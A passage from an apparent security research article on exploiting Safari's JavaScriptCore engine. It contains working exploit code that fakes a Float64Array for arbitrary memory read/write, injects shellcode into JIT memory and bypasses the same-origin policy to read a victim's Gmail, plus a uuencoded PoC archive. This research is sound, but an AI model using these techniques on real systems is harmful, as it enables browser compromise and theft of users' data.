(lldb) x/6gx 0x10cd97c10
|
||
|
0x10cd97c10: 0x0100150000000136 0x0000000000000000
|
||
|
0x10cd97c20: 0xffff000000001337 0x0000000000000006
|
||
|
0x10cd97c30: 0x402bbd70a3d70a3d 0x000000010cdc7e10
|
||
|
|
||
|
The first quadword is the JSCell. The second one the Butterfly pointer,
|
||
|
which is null since all properties are stored inline. Next are the inline
|
||
|
JSValue slots for the four properties: an integer, false, a double, and a
|
||
|
JSObject pointer. If we were to add more properties to the object, a
|
||
|
butterfly would at some point be allocated to store these.
|
||
|
|
||
|
So what does a JSCell contain? JSCell.h reveals:
|
||
|
|
||
|
StructureID m_structureID;
|
||
|
This is the most interesting one, we'll explore it further below.
|
||
|
|
||
|
IndexingType m_indexingType;
|
||
|
We've already seen this before. It indicates the storage mode of
|
||
|
the object's elements.
|
||
|
|
||
|
JSType m_type;
|
||
|
Stores the type of this cell: string, symbol,function,
|
||
|
plain object, ...
|
||
|
|
||
|
TypeInfo::InlineTypeFlags m_flags;
|
||
|
Flags that aren't too important for our purposes. JSTypeInfo.h
|
||
|
contains further information.
|
||
|
|
||
|
CellState m_cellState;
|
||
|
We've also seen this before. It is used by the garbage collector
|
||
|
during collection.
|
||
|
|
||
|
|
||
|
----[ 5.3 - About structures
|
||
|
|
||
|
JSC creates meta-objects which describe the structure, or layout, of a
|
||
|
JavaScript object. These objects represent mappings from property names to
|
||
|
indices into the inline storage or the butterfly (both are treated as
|
||
|
JSValue arrays). In its most basic form, such a structure could be an array
|
||
|
of <property name, slot index> pairs. It could also be implemented as a
|
||
|
linked list or a hash map. Instead of storing a pointer to this structure
|
||
|
in every JSCell instance, the developers instead decided to store a 32-bit
|
||
|
index into a structure table to save some space for the other fields.
|
||
|
|
||
|
So what happens when a new property is added to an object? If this happens
|
||
|
for the first time then a new Structure instance will be allocated,
|
||
|
containing the previous slot indices for all exiting properties and an
|
||
|
additional one for the new property. The property would then be stored at
|
||
|
the corresponding index, possibly requiring a reallocation of the
|
||
|
butterfly. To avoid repeating this process, the resulting Structure
|
||
|
instance can be cached in the previous structure, in a data structure
|
||
|
called "transiton table". The original structure might also be adjusted to
|
||
|
allocate more inline or butterfly storage up front to avoid the
|
||
|
reallocation. This mechanism ultimately makes structures reusable.
|
||
|
|
||
|
Time for an example. Suppose we have the following JavaScript code:
|
||
|
|
||
|
var o = { foo: 42 };
|
||
|
if (someCondition)
|
||
|
o.bar = 43;
|
||
|
else
|
||
|
o.baz = 44;
|
||
|
|
||
|
This would result in the creation of the following three Structure
|
||
|
instances, here shown with the (arbitrary) property name to slot index
|
||
|
mappings:
|
||
|
|
||
|
+-----------------+ +-----------------+
|
||
|
| Structure 1 | +bar | Structure 2 |
|
||
|
| +--------->| |
|
||
|
| foo: 0 | | foo: 0 |
|
||
|
+--------+--------+ | bar: 1 |
|
||
|
| +-----------------+
|
||
|
| +baz +-----------------+
|
||
|
+-------->| Structure 3 |
|
||
|
| |
|
||
|
| foo: 0 |
|
||
|
| baz: 1 |
|
||
|
+-----------------+
|
||
|
|
||
|
Whenever this piece of code was executed again, the correct structure for
|
||
|
the created object would then be easy to find.
|
||
|
|
||
|
Essentially the same concept is used by all major engines today. V8 calls
|
||
|
them maps or hidden classes [19] while Spidermonkey calls them Shapes.
|
||
|
|
||
|
This technique also makes speculative JIT compilers simpler. Assume the
|
||
|
following function:
|
||
|
|
||
|
function foo(a) {
|
||
|
return a.bar + 3;
|
||
|
}
|
||
|
|
||
|
Assume further that we have executed the above function a couple of times
|
||
|
inside the interpreter and now decide to compile it to native code for
|
||
|
better performance. How do we deal with the property lookup? We could
|
||
|
simply jump out to the interpreter to perform the lookup, but that would be
|
||
|
quite expensive. Assuming we've also traced the objects that were given to
|
||
|
foo as arguments and found out they all used the same structure. We can now
|
||
|
generate (pseudo-)assembly code like the following. Here r0 initially
|
||
|
points to the argument object:
|
||
|
|
||
|
mov r1, [r0 + #structure_id_offset];
|
||
|
cmp r1, #structure_id;
|
||
|
jne bailout_to_interpreter;
|
||
|
mov r2, [r0 + #inline_property_offset];
|
||
|
|
||
|
This is just a few instructions slower than a property access in a native
|
||
|
language such as C. Note that the structure ID and property offset are
|
||
|
cached inside the code itself, thus the name for these kind of code
|
||
|
constructs: inline caches.
|
||
|
|
||
|
Besides the property mappings, structures also store a reference to a
|
||
|
ClassInfo instance. This instance contains the name of the class
|
||
|
("Float64Array", "HTMLParagraphElement", ...), which is also accessible
|
||
|
from script via the following slight hack:
|
||
|
|
||
|
Object.prototype.toString.call(object);
|
||
|
// Might print "[object HTMLParagraphElement]"
|
||
|
|
||
|
However, the more important property of the ClassInfo is its MethodTable
|
||
|
reference. A MethodTable contains a set of function pointers, similar to a
|
||
|
vtable in C++. Most of the object related operations [20] as well as some
|
||
|
garbage collection related tasks (visiting all referenced objects for
|
||
|
example) are implemented through methods in the method table. To give an
|
||
|
idea about how the method table is used, the following code snippet from
|
||
|
JSArray.cpp is shown. This function is part of the MethodTable of the
|
||
|
ClassInfo instance for JavaScript arrays and will be called whenever a
|
||
|
property of such an instance is deleted [21] by script
|
||
|
|
||
|
bool JSArray::deleteProperty(JSCell* cell, ExecState* exec,
|
||
|
PropertyName propertyName)
|
||
|
{
|
||
|
JSArray* thisObject = jsCast<JSArray*>(cell);
|
||
|
|
||
|
if (propertyName == exec->propertyNames().length)
|
||
|
return false;
|
||
|
|
||
|
return JSObject::deleteProperty(thisObject, exec, propertyName);
|
||
|
}
|
||
|
|
||
|
As we can see, deleteProperty has a special case for the .length property
|
||
|
of an array (which it won't delete), but otherwise forwards the request to
|
||
|
the parent implementation.
|
||
|
|
||
|
The next diagram summarizes (and slightly simplifies) the relationships
|
||
|
between the different C++ classes that together build up the JSC object
|
||
|
system.
|
||
|
|
||
|
+------------------------------------------+
|
||
|
| Butterfly |
|
||
|
| baz | bar | foo | length: 2 | 42 | 13.37 |
|
||
|
+------------------------------------------+
|
||
|
^
|
||
|
+---------+
|
||
|
+----------+ |
|
||
|
| | |
|
||
|
+--+ JSCell | | +-----------------+
|
||
|
| | | | | |
|
||
|
| +----------+ | | MethodTable |
|
||
|
| /\ | | |
|
||
|
References | || inherits | | Put |
|
||
|
by ID in | +----++----+ | | Get |
|
||
|
structure | | +-----+ | Delete |
|
||
|
table | | JSObject | | VisitChildren |
|
||
|
| | |<----- | ... |
|
||
|
| +----------+ | | |
|
||
|
| /\ | +-----------------+
|
||
|
| || inherits | ^
|
||
|
| +----++----+ | |
|
||
|
| | | | associated |
|
||
|
| | JSArray | | prototype |
|
||
|
| | | | object |
|
||
|
| +----------+ | |
|
||
|
| | |
|
||
|
v | +-------+--------+
|
||
|
+-------------------+ | | ClassInfo |
|
||
|
| Structure +---+ +-->| |
|
||
|
| | | | Name: "Array" |
|
||
|
| property: slot | | | |
|
||
|
| foo : 0 +----------+ +----------------+
|
||
|
| bar : 1 |
|
||
|
| baz : 2 |
|
||
|
| |
|
||
|
+-------------------+
|
||
|
|
||
|
|
||
|
--[ 6 - Exploitation
|
||
|
|
||
|
Now that we know a bit more about the internals of the JSObject class,
|
||
|
let's get back to creating our own Float64Array instance which will provide
|
||
|
us with an arbitrary memory read/write primitive. Clearly, the most
|
||
|
important part will be the structure ID in the JSCell header, as the
|
||
|
associated structure instance is what makes our piece of memory "look like"
|
||
|
a Float64Array to the engine. We thus need to know the ID of a Float64Array
|
||
|
structure in the structure table.
|
||
|
|
||
|
|
||
|
----[ 6.1 - Predicting structure IDs
|
||
|
|
||
|
Unfortunately, structure IDs aren't necessarily static across different
|
||
|
runs as they are allocated at runtime when required. Further, the IDs of
|
||
|
structures created during engine startup are version dependent. As such we
|
||
|
don't know the structure ID of a Float64Array instance and will need to
|
||
|
determine it somehow.
|
||
|
|
||
|
Another slight complication arises since we cannot use arbitrary structure
|
||
|
IDs. This is because there are also structures allocated for other garbage
|
||
|
collected cells that are not JavaScript objects (strings, symbols, regular
|
||
|
expression objects, even structures themselves). Calling any method
|
||
|
referenced by their method table will lead to a crash due to a failed
|
||
|
assertion. These structures are only allocated at engine startup though,
|
||
|
resulting in all of them having fairly low IDs.
|
||
|
|
||
|
To overcome this problem we will make use of a simple spraying approach: we
|
||
|
will spray a few thousand structures that all describe Float64Array
|
||
|
instances, then pick a high initial ID and see if we've hit a correct one.
|
||
|
|
||
|
for (var i = 0; i < 0x1000; i++) {
|
||
|
var a = new Float64Array(1);
|
||
|
// Add a new property to create a new Structure instance.
|
||
|
a[randomString()] = 1337;
|
||
|
}
|
||
|
|
||
|
We can find out if we've guessed correctly by using 'instanceof'. If we did
|
||
|
not, we simply use the next structure.
|
||
|
|
||
|
while (!(fakearray instanceof Float64Array)) {
|
||
|
// Increment structure ID by one here
|
||
|
}
|
||
|
|
||
|
Instanceof is a fairly safe operation as it will only fetch the structure,
|
||
|
fetch the prototype from that and do a pointer comparison with the given
|
||
|
prototype object.
|
||
|
|
||
|
|
||
|
----[ 6.2 - Putting things together: faking a Float64Array
|
||
|
|
||
|
Float64Arrays are implemented by the native JSArrayBufferView class. In
|
||
|
addition to the standard JSObject fields, this class also contains the
|
||
|
pointer to the backing memory (we'll refer to it as 'vector', similar to
|
||
|
the source code), as well as a length and mode field (both 32-bit
|
||
|
integers).
|
||
|
|
||
|
Since we place our Float64Array inside the inline slots of another object
|
||
|
(referred to as 'container' from now on), we'll have to deal with some
|
||
|
restrictions that arise due to the JSValue encoding. Specifically we
|
||
|
|
||
|
* cannot set a nullptr butterfly pointer since null isn't a valid
|
||
|
JSValue. This is fine for now as the butterfly won't be accessed for
|
||
|
simple element access operations
|
||
|
|
||
|
* cannot set a valid mode field since it has to be larger than
|
||
|
0x00010000 due to the NaN-boxing. We can freely control the length
|
||
|
field though
|
||
|
|
||
|
* can only set the vector to point to another JSObject since these are
|
||
|
the only pointers that a JSValue can contain
|
||
|
|
||
|
Due to the last constraint we'll set up the Float64Array's vector to point
|
||
|
to a Uint8Array instance:
|
||
|
|
||
|
+----------------+ +----------------+
|
||
|
| Float64Array | +------------->| Uint8Array |
|
||
|
| | | | |
|
||
|
| JSCell | | | JSCell |
|
||
|
| butterfly | | | butterfly |
|
||
|
| vector ------+---+ | vector |
|
||
|
| length | | length |
|
||
|
| mode | | mode |
|
||
|
+----------------+ +----------------+
|
||
|
|
||
|
With this we can now set the data pointer of the second array to an
|
||
|
arbitrary address, providing us with an arbitrary memory read/write.
|
||
|
|
||
|
Below is the code for creating a fake Float64Array instance using our
|
||
|
previous exploit primitives. The attached exploit code then creates a
|
||
|
global 'memory' object which provides convenient methods to read from and
|
||
|
write to arbitrary memory regions.
|
||
|
|
||
|
sprayFloat64ArrayStructures();
|
||
|
|
||
|
// Create the array that will be used to
|
||
|
// read and write arbitrary memory addresses.
|
||
|
var hax = new Uint8Array(0x1000);
|
||
|
|
||
|
var jsCellHeader = new Int64([
|
||
|
00, 0x10, 00, 00, // m_structureID, current guess
|
||
|
0x0, // m_indexingType
|
||
|
0x27, // m_type, Float64Array
|
||
|
0x18, // m_flags, OverridesGetOwnPropertySlot |
|
||
|
// InterceptsGetOwnPropertySlotByIndexEvenWhenLengthIsNotZero
|
||
|
0x1 // m_cellState, NewWhite
|
||
|
]);
|
||
|
|
||
|
var container = {
|
||
|
jsCellHeader: jsCellHeader.encodeAsJSVal(),
|
||
|
butterfly: false, // Some arbitrary value
|
||
|
vector: hax,
|
||
|
lengthAndFlags: (new Int64('0x0001000000000010')).asJSValue()
|
||
|
};
|
||
|
|
||
|
// Create the fake Float64Array.
|
||
|
var address = Add(addrof(container), 16);
|
||
|
var fakearray = fakeobj(address);
|
||
|
|
||
|
// Find the correct structure ID.
|
||
|
while (!(fakearray instanceof Float64Array)) {
|
||
|
jsCellHeader.assignAdd(jsCellHeader, Int64.One);
|
||
|
container.jsCellHeader = jsCellHeader.encodeAsJSVal();
|
||
|
}
|
||
|
|
||
|
// All done, fakearray now points onto the hax array
|
||
|
|
||
|
To "visualize" the result, here is some lldb output. The container object
|
||
|
is located at 0x11321e1a0:
|
||
|
|
||
|
(lldb) x/6gx 0x11321e1a0
|
||
|
0x11321e1a0: 0x0100150000001138 0x0000000000000000
|
||
|
0x11321e1b0: 0x0118270000001000 0x0000000000000006
|
||
|
0x11321e1c0: 0x0000000113217360 0x0001000000000010
|
||
|
(lldb) p *(JSC::JSArrayBufferView*)(0x11321e1a0 + 0x10)
|
||
|
(JSC::JSArrayBufferView) $0 = {
|
||
|
JSC::JSNonFinalObject = {
|
||
|
JSC::JSObject = {
|
||
|
JSC::JSCell = {
|
||
|
m_structureID = 4096
|
||
|
m_indexingType = '\0'
|
||
|
m_type = Float64ArrayType
|
||
|
m_flags = '\x18'
|
||
|
m_cellState = NewWhite
|
||
|
}
|
||
|
m_butterfly = {
|
||
|
JSC::CopyBarrierBase = (m_value = 0x0000000000000006)
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
m_vector = {
|
||
|
JSC::CopyBarrierBase = (m_value = 0x0000000113217360)
|
||
|
}
|
||
|
m_length = 16
|
||
|
m_mode = 65536
|
||
|
}
|
||
|
|
||
|
Note that m_butterfly as well as m_mode are invalid as we cannot write null
|
||
|
there. This causes no trouble for now but will be problematic once a garbage
|
||
|
collection run occurs. We'll deal with this later.
|
||
|
|
||
|
|
||
|
----[ 6.3 - Executing shellcode
|
||
|
|
||
|
One nice thing about JavaScript engines is the fact that all of them make
|
||
|
use of JIT compiling. This requires writing instructions into a page in
|
||
|
memory and later executing them. For that reasons most engines, including
|
||
|
JSC, allocate memory regions that are both writable and executable. This is
|
||
|
a good target for our exploit. We will use our memory read/write primitive
|
||
|
to leak a pointer into the JIT compiled code for a JavaScript function,
|
||
|
then write our shellcode there and call the function, resulting in our own
|
||
|
code being executed.
|
||
|
|
||
|
The attached PoC exploit implements this. Below is the relevant part of the
|
||
|
runShellcode function.
|
||
|
|
||
|
// This simply creates a function and calls it multiple times to
|
||
|
// trigger JIT compilation.
|
||
|
var func = makeJITCompiledFunction();
|
||
|
var funcAddr = addrof(func);
|
||
|
print("[+] Shellcode function object @ " + funcAddr);
|
||
|
|
||
|
var executableAddr = memory.readInt64(Add(funcAddr, 24));
|
||
|
print("[+] Executable instance @ " + executableAddr);
|
||
|
|
||
|
var jitCodeAddr = memory.readInt64(Add(executableAddr, 16));
|
||
|
print("[+] JITCode instance @ " + jitCodeAddr);
|
||
|
|
||
|
var codeAddr = memory.readInt64(Add(jitCodeAddr, 32));
|
||
|
print("[+] RWX memory @ " + codeAddr.toString());
|
||
|
|
||
|
print("[+] Writing shellcode...");
|
||
|
memory.write(codeAddr, shellcode);
|
||
|
|
||
|
print("[!] Jumping into shellcode...");
|
||
|
func();
|
||
|
|
||
|
As can be seen, the PoC code performs the pointer leaking by reading a
|
||
|
couple of pointers from fixed offsets into a set of objects, starting from
|
||
|
a JavaScript function object. This isn't great (since offsets can change
|
||
|
between versions), but suffices for demonstration purposes. As a first
|
||
|
improvement, one should try to detect valid pointers using some simple
|
||
|
heuristics (highest bits all zero, "close" to other known memory regions,
|
||
|
...). Next, it might be possible to detect some objects based on unique
|
||
|
memory patterns. For example, all classes inheriting from JSCell (such as
|
||
|
ExecutableBase) will start with a recognizable header. Also, the JIT
|
||
|
compiled code itself will likely start with a known function prologue.
|
||
|
|
||
|
Note that starting with iOS 10, JSC no longer allocates a single RWX region
|
||
|
but rather uses two virtual mappings to the same physical memory region,
|
||
|
one of them executable and the other one writable. A special version of
|
||
|
memcpy is then emitted at runtime which contains the (random) address of
|
||
|
the writable region as immediate value and is mapped --X, preventing an
|
||
|
attacker from reading the address. To bypass this, a short ROP chain would
|
||
|
now be required to call this memcpy before jumping into the executable
|
||
|
mapping.
|
||
|
|
||
|
|
||
|
----[ 6.4 - Staying alive past garbage collection
|
||
|
|
||
|
If we wanted to keep our renderer process alive past our initial exploit
|
||
|
(we'll later see why we might want that), we are currently faced with an
|
||
|
immediate crash once the garbage collector kicks in. This happens mainly
|
||
|
because the butterfly of our faked Float64Array is an invalid pointer, but
|
||
|
not null, and will thus be accessed during GC. From
|
||
|
JSObject::visitChildren:
|
||
|
|
||
|
Butterfly* butterfly = thisObject->m_butterfly.get();
|
||
|
if (butterfly)
|
||
|
thisObject->visitButterfly(visitor, butterfly,
|
||
|
thisObject->structure(visitor.vm()));
|
||
|
|
||
|
We could set the butterfly pointer of our fake array to nullptr, but this
|
||
|
would lead to another crash since that value is also a property of our
|
||
|
container object and would be treated as a JSObject pointer. We will thus
|
||
|
do the following:
|
||
|
|
||
|
1. Create an empty object. The structure of this object will describe
|
||
|
an object with the default amount of inline storage (6 slots), but
|
||
|
none of them being used.
|
||
|
|
||
|
2. Copy the JSCell header (containing the structure ID) to the
|
||
|
container object. We've now caused the engine to "forget" about the
|
||
|
properties of the container object that make up our fake array.
|
||
|
|
||
|
3. Set the butterfly pointer of the fake array to nullptr, and, while
|
||
|
we're at it also replace the JSCell of that object with one from a
|
||
|
default Float64Array instance
|
||
|
|
||
|
The last step is required since we might end up with the structure of a
|
||
|
Float64Array with some property due to our structure spraying before.
|
||
|
|
||
|
These three steps give us a stable exploit.
|
||
|
|
||
|
On a final note, when overwriting the code of a JIT compiled function, care
|
||
|
must be taken to return a valid JSValue (if process continuation is
|
||
|
desired). Failing to do so will likely result in a crash during the
|
||
|
next GC, as the returned value will be kept by the engine and inspected by
|
||
|
the collector.
|
||
|
|
||
|
----[ 6.5 - Summary
|
||
|
|
||
|
At this point it is time for a quick summary of the full exploit:
|
||
|
|
||
|
1. Spray Float64Array structures
|
||
|
|
||
|
2. Allocate a container object with inline properties that together
|
||
|
build up a Float64Array instance in its inline property slots. Use a
|
||
|
high initial structure ID which will likely be correct due to the
|
||
|
previous spray. Set the data pointer of the array to point to a
|
||
|
Uint8Array instance.
|
||
|
|
||
|
3. Leak the address of the container object and create a fake object
|
||
|
pointing to the Float64Array inside the container object
|
||
|
|
||
|
4. See if the structure ID guess was correct using 'instanceof'. If not
|
||
|
increase the structure ID by assigning a new value to the
|
||
|
corresponding property of the container object. Repeat until we have
|
||
|
a Float64Array.
|
||
|
|
||
|
5. Read from and write to arbitrary memory addresses by writing the
|
||
|
data pointer of the Uint8Array
|
||
|
|
||
|
6. With that repair the container and the Float64Array instance to
|
||
|
avoid crashing during garbage collection
|
||
|
|
||
|
--[ 7 - Abusing the renderer process
|
||
|
|
||
|
Usually, from here the next logical step would be to fire up a sandbox
|
||
|
escape exploit of some sort for further compromise of the target machine.
|
||
|
|
||
|
Since discussion of these is out of scope for this article, and due to good
|
||
|
coverage of those in other places, let us instead explore our current
|
||
|
situation.
|
||
|
|
||
|
|
||
|
----[ 7.1 - WebKit process and privilege model
|
||
|
|
||
|
Since WebKit 2 [22] (circa 2011), WebKit features a multi-process model in
|
||
|
which a new renderer process is spawned for every tab. Besides stability
|
||
|
and performance reasons, this also provides the basis for a sandboxing
|
||
|
infrastructure to limit the damage that a compromised renderer process can
|
||
|
do to the system.
|
||
|
|
||
|
|
||
|
----[ 7.2 - The same-origin policy
|
||
|
|
||
|
The same-origin policy (SOP) provides the basis for (client-side) web
|
||
|
security. It prevents content originating from origin A from interfering
|
||
|
with content originating from another origin B. This includes script level
|
||
|
access (e.g. accessing DOM objects inside another window) as well as
|
||
|
network level access (e.g. XMLHttpRequests). Interestingly, in WebKit the
|
||
|
SOP is enforced inside the renderer processes, which means we can bypass it
|
||
|
at this point. The same is currently true for all major web browsers, but
|
||
|
chrome is about to change this with their site-isolation project [23].
|
||
|
|
||
|
This fact is nothing new and has even been exploited in the past, but it is
|
||
|
worth discussing. In essence, this means that a renderer process has full
|
||
|
access to all browser sessions and can send authenticated cross-origin
|
||
|
requests and read the response. An attacker who compromises a renderer
|
||
|
process thus obtains access to all the browser sessions of the victim.
|
||
|
|
||
|
For demonstration purposes we will now modify our exploit to display the
|
||
|
users gmail inbox.
|
||
|
|
||
|
|
||
|
----[ 7.3 - Stealing emails
|
||
|
|
||
|
There is an interesting field inside the SecurityOrigin class in WebKit:
|
||
|
m_universalAccess. If set, it will cause all cross-origin checks to
|
||
|
succeed. We can obtain a reference to the currently active SecurityDomain
|
||
|
instance by following a set of pointers (whose offsets are again dependent
|
||
|
on the current Safari version). We can then enable universalAccess for our
|
||
|
renderer process and can subsequently perform authenticated cross-origin
|
||
|
XMLHttpRequests. Reading emails from gmail then becomes as simple as
|
||
|
|
||
|
var xhr = new XMLHttpRequest();
|
||
|
xhr.open('GET', 'https://mail.google.com/mail/u/0/#inbox', false);
|
||
|
xhr.send(); // xhr.responseText now contains the full response
|
||
|
|
||
|
Included is a version of the exploit that does this and displays the
|
||
|
"users" current gmail inbox. For reasons that should be clear by now this
|
||
|
does require a valid gmail session in Safari ;)
|
||
|
|
||
|
|
||
|
--[ 8 - References
|
||
|
|
||
|
[1] http://www.zerodayinitiative.com/advisories/ZDI-16-485/
|
||
|
[2] https://webkit.org/blog/3362/introducing-the-webkit-ftl-jit/
|
||
|
[3] http://trac.webkit.org/wiki/JavaScriptCore
|
||
|
[4] http://www.ecma-international.org/
|
||
|
ecma-262/6.0/#sec-ecmascript-data-types-and-values
|
||
|
[5] http://www.ecma-international.org/ecma-262/6.0/#sec-objects
|
||
|
[6] https://en.wikipedia.org/wiki/Double-precision_floating-point_format
|
||
|
[7] http://www.ecma-international.org/
|
||
|
ecma-262/6.0/#sec-array-exotic-objects
|
||
|
[8] http://www.ecma-international.org/
|
||
|
ecma-262/6.0/#sec-ecmascript-standard-built-in-objects
|
||
|
[9] https://developer.mozilla.org/en-US/docs/Web/JavaScript/
|
||
|
Reference/Global_Objects/Array/slice).
|
||
|
[10] https://github.com/WebKit/webkit/
|
||
|
blob/320b1fc3f6f47a31b6ccb4578bcea56c32c9e10b/Source/JavaScriptCore/runtime
|
||
|
/ArrayPrototype.cpp#L848
|
||
|
[11] https://developer.mozilla.org/en-US/docs/Web/
|
||
|
JavaScript/Reference/Global_Objects/Symbol/species
|
||
|
[12] http://www.ecma-international.org/ecma-262/6.0/#sec-type-conversion
|
||
|
[13] https://bugzilla.mozilla.org/show_bug.cgi?id=735104
|
||
|
[14] https://bugzilla.mozilla.org/show_bug.cgi?id=983344
|
||
|
[15] https://bugs.chromium.org/p/chromium/issues/detail?id=554946
|
||
|
[16] https://www.gnu.org/software/guile/manual/html_node/
|
||
|
Conservative-GC.html
|
||
|
[17] http://www.ecma-international.org/
|
||
|
ecma-262/6.0/#sec-ecmascript-language-types-number-type
|
||
|
[18] http://www.ecma-international.org/ecma-262/6.0/#sec-typedarray-objects
|
||
|
[19] https://developers.google.com/v8/design#fast-property-access
|
||
|
[20] http://www.ecma-international.org/
|
||
|
ecma-262/6.0/#sec-operations-on-objects
|
||
|
[21] http://www.ecma-international.org/ecma-262/6.0/
|
||
|
#sec-ordinary-object-internal-methods-and-internal-slots-delete-p
|
||
|
[22] https://trac.webkit.org/wiki/WebKit2
|
||
|
[23] https://www.chromium.org/developers/design-documents/site-isolation
|
||
|
|
||
|
|
||
|
--[ 9 - Source code
|
||
|
|
||
|
begin 644 src.zip
|
||
|
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
|
||
|
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|
||
|
M\!A^8G:5Y(52&GU+K)I;C<Y$)^=HHJW)N"<=32*':)L8R[0UKX5=1:0VCELR
|
||
|
MM464*Q>H)3H-=!^4%%PN[0J^A%.XNH*381WC&3F]K<)OGA!48OG"PW^%J*[X
|
||
|
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|
||
|
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|
||
|
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|
||
|
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|
||
|
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|
||
|
M\X!2YF!\\]5;JO'9+L_AT:/Z\/QP^/X]=,YXIZD\*C077C*Y#*!QPRI%(*2R
|
||
|
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|
||
|
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|
||
|
M#L(\#\_B6G]6.A:H"@!KB'J=QK,O)R:H_,-4_S#_U07S@5Q32MLYI82V<A=3
|
||
|
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|
||
|
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|
||
|
M[1,N5EKN+($G2D?N!PYV/M0D/%@`E=602A[L$_+!,[UUWY=BRR76=,9W'9/7
|
||
|
M-K0I!HSZ^A%O'[+E6[$?9"D)6"P89$KPU![8K_>`CT1=[1`UV?9`Z'%IX.,W
|
||
|
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|
||
|
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|
||
|
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|
||
|
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||
|
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||
|
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||
|
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|
||
|
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|
||
|
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||
|
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||
|
MQ6&_4D46L%`R&AV8=GA^-,5R$PZ(RKGHX%T<'R8,RM68-YLU-7"CZ[K3H0^H
|
||
|
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|
||
|
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|
||
|
M```(``^N1DF4@XGQ3`,``%`(```,`!P`<W)C+W!W;BYH=&UL550)``..JO97
|
||
|
M":OV5W5X"P`!!/4!```$4````(566V_:,!1^[Z\XY:5!T$`OZD.A:!6EVJIJ
|
||
|
MG0I:-W5],(D#;A,[LD^X:.I_WW$N)*'0(82#_9WS?>=B._W#FX?AY/>/$<PQ
|
||
|
M"@<'_6+@S!\<`/0-KD-NGP"FRE_#W_01(%`2CP,6B7!]"9&2RL3,X[UT]=T:
|
||
|
M=G++U(FG18Q@M'?52%"$QGTUC0%!TOG!-D1(O#C_'!(OY1:@1&1J@T1Z*)2$
|
||
|
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|
||
|
M!G#.X>[;Y-A342Q"[H.G?$XIT<!*WJ7`>8J<B0678.8\#%,<DS[H1!H0Z.:N
|
||
|
M"X;)7)C,&8VQYHAK6'!MK#^?QUSZI!F,D!XA,)\R0*N!6)&.6*N8:S)206`X
|
||
|
MFL(_#%42^C`EJX@P"X).$R1U1$/?F5(^<*F2V3R-0JJE6T\BZ1T7`3B;4*H9
|
||
|
M%0$XA\+\3$+*)9N&W&E6E^TGJT3C^?@%[L;#36!2(2PV9BY<3Y5&(6>-9J]F
|
||
|
M3NE(M"SG\L+4=$;LC5-EAGEA;O-Y9UO*Q@"9GG%T5MN`DA!6=1D5VCRYMTI[
|
||
|
M:4-`UA#,>G;K?)159\$T"+B";H^&/IQTN_:IU=K%G>L2S4_)<X49>&=F2-Z8
|
||
|
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M```$4````%!+`0(>`Q0````(`/1N1DD56OBT%@8``&@2```,`!@```````$`
